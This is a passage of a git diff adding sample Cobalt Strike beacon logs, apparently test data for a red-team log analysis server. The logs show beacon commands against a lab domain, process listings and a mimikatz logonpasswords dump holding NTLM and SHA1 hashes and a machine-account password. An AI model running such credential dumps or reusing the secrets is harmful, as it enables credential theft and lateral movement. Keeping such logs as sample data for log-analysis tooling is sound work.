UTC [output] +[System Process] 0 0 +System 0 4 x64 0 +Registry 4 88 x64 NT AUTHORITY\SYSTEM 0 +smss.exe 4 404 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 504 512 x64 NT AUTHORITY\SYSTEM 0 +wininit.exe 504 584 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 576 592 x64 NT AUTHORITY\SYSTEM 1 +winlogon.exe 576 676 x64 NT AUTHORITY\SYSTEM 1 +services.exe 584 692 x64 NT AUTHORITY\SYSTEM 0 +lsass.exe 584 724 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 832 x64 NT AUTHORITY\SYSTEM 0 +fontdrvhost.exe 676 840 x64 Font Driver Host\UMFD-1 1 +fontdrvhost.exe 584 848 x64 Font Driver Host\UMFD-0 0 +svchost.exe 692 916 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 956 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 1012 x64 NT AUTHORITY\SYSTEM 0 +LogonUI.exe 676 508 x64 NT AUTHORITY\SYSTEM 1 +dwm.exe 676 744 x64 Window Manager\DWM-1 1 +svchost.exe 692 932 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 972 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 1092 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1100 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1132 
x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1168 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1224 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1288 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1296 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1348 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 1432 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1476 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1496 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1668 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 1680 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1692 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1752 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1760 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1788 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1888 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1916 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1936 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1084 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1448 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1452 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2004 x64 NT AUTHORITY\SYSTEM 0 +Memory Compression 4 2208 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2236 x64 NT AUTHORITY\SYSTEM 0 +VSSVC.exe 692 2248 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2256 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 2308 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2344 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 2384 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2432 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 2480 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 2644 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 2652 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 2756 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2764 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2772 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 2780 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 2892 x64 NT AUTHORITY\SYSTEM 0 +spoolsv.exe 692 2972 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 
2980 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 3092 x64 NT AUTHORITY\NETWORK SERVICE 0 +OfficeClickToRun.exe 692 3104 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 3112 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 3132 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 3200 x64 NT AUTHORITY\SYSTEM 0 +WaAppAgent.exe 692 3220 x64 NT AUTHORITY\SYSTEM 0 +sysmon64.exe 692 3236 x64 NT AUTHORITY\SYSTEM 0 +WindowsAzureGuestAgent.exe 692 3304 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 3312 x64 NT AUTHORITY\LOCAL SERVICE 0 +MsMpEng.exe 692 3324 x64 NT AUTHORITY\SYSTEM 0 +WindowsAzureNetAgent.exe 692 3340 x64 NT AUTHORITY\SYSTEM 0 +WindowsAzureTelemetryService.exe 692 3364 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 3372 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 3380 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 3444 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 3540 x64 NT AUTHORITY\LOCAL SERVICE 0 +VFPlugin.exe 3340 3740 x64 NT AUTHORITY\SYSTEM 0 +conhost.exe 3740 3764 x64 NT AUTHORITY\SYSTEM 0 +unsecapp.exe 916 1420 x64 NT AUTHORITY\SYSTEM 0 +WmiPrvSE.exe 916 4140 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 4348 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 4688 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 4744 x64 NT AUTHORITY\SYSTEM 0 +taskhostw.exe 1168 4128 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 4444 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 5660 x64 NT AUTHORITY\LOCAL SERVICE 0 +WaSecAgentProv.exe 3220 5292 x64 NT AUTHORITY\SYSTEM 0 +conhost.exe 5292 5344 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 6080 x64 NT AUTHORITY\LOCAL SERVICE 0 +SgrmBroker.exe 692 4980 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 5308 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 152 x64 NT AUTHORITY\LOCAL SERVICE 0 +SearchIndexer.exe 692 68 x64 NT AUTHORITY\SYSTEM 0 +SecurityHealthService.exe 692 4244 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 3956 5484 x64 NT AUTHORITY\SYSTEM 2 +winlogon.exe 3956 1688 x64 NT AUTHORITY\SYSTEM 2 +fontdrvhost.exe 1688 2108 x64 Font Driver Host\UMFD-2 
2 +dwm.exe 1688 5416 x64 Window Manager\DWM-2 2 +rdpclip.exe 972 5620 x64 STROOP\W.Trommel 2 +sihost.exe 1476 5172 x64 STROOP\W.Trommel 2 +svchost.exe 692 2284 x64 STROOP\W.Trommel 2 +svchost.exe 692 5800 x64 STROOP\W.Trommel 2 +taskhostw.exe 1168 1932 x64 STROOP\W.Trommel 2 +svchost.exe 692 5580 x64 NT AUTHORITY\SYSTEM 0 +powershell.exe 1168 5472 x64 STROOP\W.Trommel 2 +svchost.exe 692 5364 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 4160 x64 NT AUTHORITY\SYSTEM 0 +ctfmon.exe 5364 4844 x64 STROOP\W.Trommel 2 +explorer.exe 4204 5992 x64 STROOP\W.Trommel 2 +svchost.exe 692 1776 x64 STROOP\W.Trommel 2 +conhost.exe 5472 6208 x64 STROOP\W.Trommel 2 +ShellExperienceHost.exe 916 6248 x64 STROOP\W.Trommel 2 +SearchUI.exe 916 6440 x64 STROOP\W.Trommel 2 +RuntimeBroker.exe 916 6520 x64 STROOP\W.Trommel 2 +RuntimeBroker.exe 916 6732 x64 STROOP\W.Trommel 2 +powershell.exe 5472 6976 x64 STROOP\W.Trommel 2 +conhost.exe 6976 6992 x64 STROOP\W.Trommel 2 +powershell.exe 5472 7112 x64 STROOP\W.Trommel 2 +conhost.exe 7112 7124 x64 STROOP\W.Trommel 2 +RuntimeBroker.exe 916 1380 x64 STROOP\W.Trommel 2 +iexplore.exe 916 2836 x64 STROOP\W.Trommel 2 +iexplore.exe 2836 6988 x86 STROOP\W.Trommel 2 +smartscreen.exe 916 7236 x64 STROOP\W.Trommel 2 +SecurityHealthSystray.exe 5992 7284 x64 STROOP\W.Trommel 2 +svchost.exe 692 7508 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 7396 x64 STROOP\W.Trommel 2 +dllhost.exe 916 8172 x64 STROOP\W.Trommel 2 +SearchProtocolHost.exe 68 6864 x64 STROOP\W.Trommel 2 +FlashUtil_ActiveX.exe 916 6096 x64 STROOP\W.Trommel 2 +wsmprovhost.exe 916 4164 x64 STROOP\W.Tax 0 +svchost.exe 692 6752 x64 NT AUTHORITY\SYSTEM 0 +WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe 916 6740 x64 STROOP\W.Trommel 2 +audiodg.exe 2432 7244 x64 NT AUTHORITY\LOCAL SERVICE 0 +ApplicationFrameHost.exe 916 7764 x64 STROOP\W.Trommel 2 +svchost.exe 692 6056 x64 NT AUTHORITY\LOCAL SERVICE 0 +dllhost.exe 916 5816 x64 STROOP\W.Trommel 2 +svchost.exe 692 5288 x64 NT AUTHORITY\LOCAL 
SERVICE 0 +rundll32.exe 5880 7916 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 864 x64 NT AUTHORITY\SYSTEM 0 +taskhostw.exe 1168 3600 x64 STROOP\W.Trommel 2 +SearchFilterHost.exe 68 3416 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 7552 x64 NT AUTHORITY\SYSTEM 0 + + +03/30 09:20:39 UTC [input] sleep 30s [from: Beacon 10.1.4.10@3284] +03/30 09:20:39 UTC [task] Tasked beacon to sleep for 30s +03/30 09:20:40 UTC [checkin] host called home, sent: 92 bytes +03/30 12:22:06 UTC [input] sleep 60 5 +03/30 12:22:06 UTC [task] Tasked beacon to sleep for 60s (5% jitter) +03/30 12:22:22 UTC [checkin] host called home, sent: 92 bytes diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.4.10/beacon_22170412.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.4.10/beacon_22170412.log new file mode 100644 index 00000000..727afe24 --- /dev/null +++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.4.10/beacon_22170412.log 
@@ -0,0 +1,660 @@ +03/30 09:04:07 UTC [metadata] beacon_1282172642 -> 10.1.4.10; computer: L-WIN227; user: SYSTEM *; process: rundll32.exe; pid: 3284; os: Windows; version: 10.0; beacon arch: x64 (x64) +03/30 09:04:07 UTC [output] +established link to parent beacon: 10.1.3.11 + +03/30 09:04:16 UTC [input] logonpasswords +03/30 09:04:16 UTC [task] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command +03/30 09:04:17 UTC [checkin] host called home, sent: 417362 bytes +03/30 09:04:18 UTC [output] +received output: + +Authentication Id : 0 ; 1204847 (00000000:0012626f) +Session : RemoteInteractive from 2 +User Name : ADMIN-w.trommel +Domain : STROOP +Logon Server : S-WIN21 +Logon Time : 3/30/2020 8:36:48 AM +SID : S-1-5-21-2163199188-2306780613-1636707950-4731 + msv : + [00000003] Primary + * Username : ADMIN-W.Trommel + * Domain : STROOP + * NTLM : e4a22d8e7bbec871b341c88c2e94cba2 + * SHA1 : e4d319d431fc5f20f9b459d40870854c840834d7 + * DPAPI : 084184796699243227158b41c2c4a96a + tspkg : + wdigest : + * Username : ADMIN-W.Trommel + * Domain : STROOP + * Password : (null) + kerberos : + * Username : ADMIN-W.Trommel + * Domain : STROOP.LOCAL + * Password : (null) + ssp : + credman : + +Authentication Id : 0 ; 1200018 (00000000:00124f92) +Session : RemoteInteractive from 2 +User Name : ADMIN-w.trommel +Domain : STROOP +Logon Server : S-WIN21 +Logon Time : 3/30/2020 8:36:48 AM +SID : S-1-5-21-2163199188-2306780613-1636707950-4731 + msv : + [00000003] Primary + * Username : ADMIN-W.Trommel + * Domain : STROOP + * NTLM : e4a22d8e7bbec871b341c88c2e94cba2 + * SHA1 : e4d319d431fc5f20f9b459d40870854c840834d7 + * DPAPI : 084184796699243227158b41c2c4a96a + tspkg : + wdigest : + * Username : ADMIN-W.Trommel + * Domain : STROOP + * Password : (null) + kerberos : + * Username : ADMIN-w.trommel + * Domain : STROOP.LOCAL + * Password : (null) + ssp : + credman : + +Authentication Id : 0 ; 1171434 (00000000:0011dfea) +Session : Interactive from 2 +User Name : DWM-2 +Domain : 
Window Manager +Logon Server : (null) +Logon Time : 3/30/2020 8:36:48 AM +SID : S-1-5-90-0-2 + msv : + [00000003] Primary + * Username : L-WIN227$ + * Domain : STROOP + * NTLM : 6c3efa2c8e5131ce090ca83175b2dbb1 + * SHA1 : c97a31132db6a1b422870ced42e97c337c542627 + tspkg : + wdigest : + * Username : L-WIN227$ + * Domain : STROOP + * Password : (null) + kerberos : + * Username : L-WIN227$ + * Domain : stroop.local + * Password : hTHDWrB.P5[8!,wEBB&CJM&W!c;V)[ae#3:C&9h87uD?4;[1Z7_5!:Z1t%"-^+jt0*.i#Ccq^0@wL)F'QRJSl<-j3_K1MYV!!52M1'EyIhjdjyyTb5Up7''M + ssp : + credman : + +Authentication Id : 0 ; 1170989 (00000000:0011de2d) +Session : Interactive from 2 +User Name : DWM-2 +Domain : Window Manager +Logon Server : (null) +Logon Time : 3/30/2020 8:36:48 AM +SID : S-1-5-90-0-2 + msv : + [00000003] Primary + * Username : L-WIN227$ + * Domain : STROOP + * NTLM : 6c3efa2c8e5131ce090ca83175b2dbb1 + * SHA1 : c97a31132db6a1b422870ced42e97c337c542627 + tspkg : + wdigest : + * Username : L-WIN227$ + * Domain : STROOP + * Password : (null) + kerberos : + * Username : L-WIN227$ + * Domain : stroop.local + * Password : hTHDWrB.P5[8!,wEBB&CJM&W!c;V)[ae#3:C&9h87uD?4;[1Z7_5!:Z1t%"-^+jt0*.i#Ccq^0@wL)F'QRJSl<-j3_K1MYV!!52M1'EyIhjdjyyTb5Up7''M + ssp : + credman : + +Authentication Id : 0 ; 1170133 (00000000:0011dad5) +Session : Interactive from 2 +User Name : UMFD-2 +Domain : Font Driver Host +Logon Server : (null) +Logon Time : 3/30/2020 8:36:48 AM +SID : S-1-5-96-0-2 + msv : + [00000003] Primary + * Username : L-WIN227$ + * Domain : STROOP + * NTLM : 6c3efa2c8e5131ce090ca83175b2dbb1 + * SHA1 : c97a31132db6a1b422870ced42e97c337c542627 + tspkg : + wdigest : + * Username : L-WIN227$ + * Domain : STROOP + * Password : (null) + kerberos : + * Username : L-WIN227$ + * Domain : stroop.local + * Password : hTHDWrB.P5[8!,wEBB&CJM&W!c;V)[ae#3:C&9h87uD?4;[1Z7_5!:Z1t%"-^+jt0*.i#Ccq^0@wL)F'QRJSl<-j3_K1MYV!!52M1'EyIhjdjyyTb5Up7''M + ssp : + credman : + +Authentication Id : 0 ; 997 (00000000:000003e5) 
+Session : Service from 0 +User Name : LOCAL SERVICE +Domain : NT AUTHORITY +Logon Server : (null) +Logon Time : 3/30/2020 7:46:05 AM +SID : S-1-5-19 + msv : + tspkg : + wdigest : + * Username : (null) + * Domain : (null) + * Password : (null) + kerberos : + * Username : (null) + * Domain : (null) + * Password : (null) + ssp : + credman : + +Authentication Id : 0 ; 51952 (00000000:0000caf0) +Session : Interactive from 1 +User Name : DWM-1 +Domain : Window Manager +Logon Server : (null) +Logon Time : 3/30/2020 7:46:05 AM +SID : S-1-5-90-0-1 + msv : + [00000003] Primary + * Username : L-WIN227$ + * Domain : STROOP + * NTLM : 6c3efa2c8e5131ce090ca83175b2dbb1 + * SHA1 : c97a31132db6a1b422870ced42e97c337c542627 + tspkg : + wdigest : + * Username : L-WIN227$ + * Domain : STROOP + * Password : (null) + kerberos : + * Username : L-WIN227$ + * Domain : stroop.local + * Password : hTHDWrB.P5[8!,wEBB&CJM&W!c;V)[ae#3:C&9h87uD?4;[1Z7_5!:Z1t%"-^+jt0*.i#Ccq^0@wL)F'QRJSl<-j3_K1MYV!!52M1'EyIhjdjyyTb5Up7''M + ssp : + credman : + +Authentication Id : 0 ; 51837 (00000000:0000ca7d) +Session : Interactive from 1 +User Name : DWM-1 +Domain : Window Manager +Logon Server : (null) +Logon Time : 3/30/2020 7:46:05 AM +SID : S-1-5-90-0-1 + msv : + [00000003] Primary + * Username : L-WIN227$ + * Domain : STROOP + * NTLM : 6c3efa2c8e5131ce090ca83175b2dbb1 + * SHA1 : c97a31132db6a1b422870ced42e97c337c542627 + tspkg : + wdigest : + * Username : L-WIN227$ + * Domain : STROOP + * Password : (null) + kerberos : + * Username : L-WIN227$ + * Domain : stroop.local + * Password : hTHDWrB.P5[8!,wEBB&CJM&W!c;V)[ae#3:C&9h87uD?4;[1Z7_5!:Z1t%"-^+jt0*.i#Ccq^0@wL)F'QRJSl<-j3_K1MYV!!52M1'EyIhjdjyyTb5Up7''M + ssp : + credman : + +Authentication Id : 0 ; 996 (00000000:000003e4) +Session : Service from 0 +User Name : L-WIN227$ +Domain : STROOP +Logon Server : (null) +Logon Time : 3/30/2020 7:46:05 AM +SID : S-1-5-20 + msv : + [00000003] Primary + * Username : L-WIN227$ + * Domain : STROOP + * NTLM : 
6c3efa2c8e5131ce090ca83175b2dbb1 + * SHA1 : c97a31132db6a1b422870ced42e97c337c542627 + tspkg : + wdigest : + * Username : L-WIN227$ + * Domain : STROOP + * Password : (null) + kerberos : + * Username : l-win227$ + * Domain : STROOP.LOCAL + * Password : (null) + ssp : + credman : + +Authentication Id : 0 ; 29657 (00000000:000073d9) +Session : Interactive from 1 +User Name : UMFD-1 +Domain : Font Driver Host +Logon Server : (null) +Logon Time : 3/30/2020 7:46:05 AM +SID : S-1-5-96-0-1 + msv : + [00000003] Primary + * Username : L-WIN227$ + * Domain : STROOP + * NTLM : 6c3efa2c8e5131ce090ca83175b2dbb1 + * SHA1 : c97a31132db6a1b422870ced42e97c337c542627 + tspkg : + wdigest : + * Username : L-WIN227$ + * Domain : STROOP + * Password : (null) + kerberos : + * Username : L-WIN227$ + * Domain : stroop.local + * Password : hTHDWrB.P5[8!,wEBB&CJM&W!c;V)[ae#3:C&9h87uD?4;[1Z7_5!:Z1t%"-^+jt0*.i#Ccq^0@wL)F'QRJSl<-j3_K1MYV!!52M1'EyIhjdjyyTb5Up7''M + ssp : + credman : + +Authentication Id : 0 ; 29612 (00000000:000073ac) +Session : Interactive from 0 +User Name : UMFD-0 +Domain : Font Driver Host +Logon Server : (null) +Logon Time : 3/30/2020 7:46:05 AM +SID : S-1-5-96-0-0 + msv : + [00000003] Primary + * Username : L-WIN227$ + * Domain : STROOP + * NTLM : 6c3efa2c8e5131ce090ca83175b2dbb1 + * SHA1 : c97a31132db6a1b422870ced42e97c337c542627 + tspkg : + wdigest : + * Username : L-WIN227$ + * Domain : STROOP + * Password : (null) + kerberos : + * Username : L-WIN227$ + * Domain : stroop.local + * Password : hTHDWrB.P5[8!,wEBB&CJM&W!c;V)[ae#3:C&9h87uD?4;[1Z7_5!:Z1t%"-^+jt0*.i#Ccq^0@wL)F'QRJSl<-j3_K1MYV!!52M1'EyIhjdjyyTb5Up7''M + ssp : + credman : + +Authentication Id : 0 ; 28303 (00000000:00006e8f) +Session : UndefinedLogonType from 0 +User Name : (null) +Domain : (null) +Logon Server : (null) +Logon Time : 3/30/2020 7:46:05 AM +SID : + msv : + [00000003] Primary + * Username : L-WIN227$ + * Domain : STROOP + * NTLM : 6c3efa2c8e5131ce090ca83175b2dbb1 + * SHA1 : 
c97a31132db6a1b422870ced42e97c337c542627 + tspkg : + wdigest : + kerberos : + ssp : + credman : + +Authentication Id : 0 ; 999 (00000000:000003e7) +Session : UndefinedLogonType from 0 +User Name : L-WIN227$ +Domain : STROOP +Logon Server : (null) +Logon Time : 3/30/2020 7:46:05 AM +SID : S-1-5-18 + msv : + tspkg : + wdigest : + * Username : L-WIN227$ + * Domain : STROOP + * Password : (null) + kerberos : + * Username : l-win227$ + * Domain : STROOP.LOCAL + * Password : (null) + ssp : + credman : + + +03/30 09:04:20 UTC [input] ps +03/30 09:04:20 UTC [task] Tasked beacon to list processes +03/30 09:04:23 UTC [checkin] host called home, sent: 12 bytes +03/30 09:04:23 UTC [output] +[System Process] 0 0 +System 0 4 x64 NT AUTHORITY\SYSTEM 0 +Registry 4 88 x64 NT AUTHORITY\SYSTEM 0 +smss.exe 4 404 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 492 512 x64 NT AUTHORITY\SYSTEM 0 +wininit.exe 492 588 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 580 596 x64 NT AUTHORITY\SYSTEM 1 +winlogon.exe 580 684 x64 NT AUTHORITY\SYSTEM 1 +services.exe 588 696 x64 NT AUTHORITY\SYSTEM 0 +lsass.exe 588 732 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 832 x64 NT AUTHORITY\SYSTEM 0 +fontdrvhost.exe 588 844 x64 Font Driver Host\UMFD-0 0 +fontdrvhost.exe 684 852 x64 Font Driver Host\UMFD-1 1 +svchost.exe 696 920 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 968 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 1012 x64 NT AUTHORITY\SYSTEM 0 +LogonUI.exe 684 584 x64 NT AUTHORITY\SYSTEM 1 +dwm.exe 684 652 x64 Window Manager\DWM-1 1 +svchost.exe 696 1008 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1032 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 1052 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1064 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1172 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1192 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1208 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 1256 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1312 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 
696 1376 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1456 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1484 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1520 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1528 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1644 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1664 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 1692 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1700 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1784 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1792 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1908 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1924 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1976 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1988 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2008 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1120 x64 NT AUTHORITY\SYSTEM 0 +Memory Compression 4 2128 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2164 x64 NT AUTHORITY\SYSTEM 0 +VSSVC.exe 696 2200 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2224 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 2252 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2300 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2380 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2392 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2432 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2516 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2532 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 2548 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2612 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2628 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2700 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2792 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2868 x64 NT AUTHORITY\SYSTEM 0 +spoolsv.exe 696 3036 x64 NT AUTHORITY\SYSTEM 0 +OfficeClickToRun.exe 696 3156 x64 NT AUTHORITY\SYSTEM 0 +sysmon64.exe 696 3176 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 3188 x64 NT AUTHORITY\NETWORK SERVICE 0 +WaAppAgent.exe 696 3196 x64 NT AUTHORITY\SYSTEM 0 
+svchost.exe 696 3204 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 3216 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 3224 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 3232 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 3256 x64 NT AUTHORITY\SYSTEM 0 +MsMpEng.exe 696 3288 x64 NT AUTHORITY\SYSTEM 0 +WindowsAzureGuestAgent.exe 696 3300 x64 NT AUTHORITY\SYSTEM 0 +WindowsAzureTelemetryService.exe 696 3348 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 3376 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 3392 x64 NT AUTHORITY\SYSTEM 0 +unsecapp.exe 920 3728 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 3928 x64 NT AUTHORITY\LOCAL SERVICE 0 +WmiPrvSE.exe 920 3312 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 4320 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 4744 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 4776 x64 NT AUTHORITY\SYSTEM 0 +taskhostw.exe 1256 4688 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2656 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 5428 x64 NT AUTHORITY\LOCAL SERVICE 0 +WaSecAgentProv.exe 3196 6060 x64 NT AUTHORITY\SYSTEM 0 +conhost.exe 6060 6088 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1076 x64 NT AUTHORITY\LOCAL SERVICE 0 +SgrmBroker.exe 696 5940 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 6068 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 5920 x64 NT AUTHORITY\LOCAL SERVICE 0 +SearchIndexer.exe 696 5636 x64 NT AUTHORITY\SYSTEM 0 +SecurityHealthService.exe 696 4104 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 5788 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 5132 4300 x64 NT AUTHORITY\SYSTEM 2 +winlogon.exe 5132 4592 x64 NT AUTHORITY\SYSTEM 2 +dwm.exe 4592 3272 x64 Window Manager\DWM-2 2 +fontdrvhost.exe 4592 5980 x64 Font Driver Host\UMFD-2 2 +rdpclip.exe 1032 5588 x64 STROOP\ADMIN-W.Trommel 2 +sihost.exe 1520 464 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 4388 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 1116 x64 STROOP\ADMIN-W.Trommel 2 +taskhostw.exe 1256 1748 x64 STROOP\ADMIN-W.Trommel 2 +powershell.exe 1256 1464 x64 
STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 5652 x64 NT AUTHORITY\SYSTEM 0 +conhost.exe 1464 1684 x64 STROOP\ADMIN-W.Trommel 2 +ctfmon.exe 5652 1060 x64 STROOP\ADMIN-W.Trommel 2 +explorer.exe 4684 4632 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 372 x64 STROOP\ADMIN-W.Trommel 2 +ShellExperienceHost.exe 920 6160 x64 STROOP\ADMIN-W.Trommel 2 +SearchUI.exe 920 6276 x64 STROOP\ADMIN-W.Trommel 2 +RuntimeBroker.exe 920 6464 x64 STROOP\ADMIN-W.Trommel 2 +RuntimeBroker.exe 920 6568 x64 STROOP\ADMIN-W.Trommel 2 +powershell.exe 1464 6908 x64 STROOP\ADMIN-W.Trommel 2 +conhost.exe 6908 6916 x64 STROOP\ADMIN-W.Trommel 2 +powershell.exe 1464 7004 x64 STROOP\ADMIN-W.Trommel 2 +conhost.exe 7004 7012 x64 STROOP\ADMIN-W.Trommel 2 +RuntimeBroker.exe 920 2296 x64 STROOP\ADMIN-W.Trommel 2 +iexplore.exe 920 6376 x64 STROOP\ADMIN-W.Trommel 2 +iexplore.exe 6376 2320 x86 STROOP\ADMIN-W.Trommel 2 +smartscreen.exe 920 7204 x64 STROOP\ADMIN-W.Trommel 2 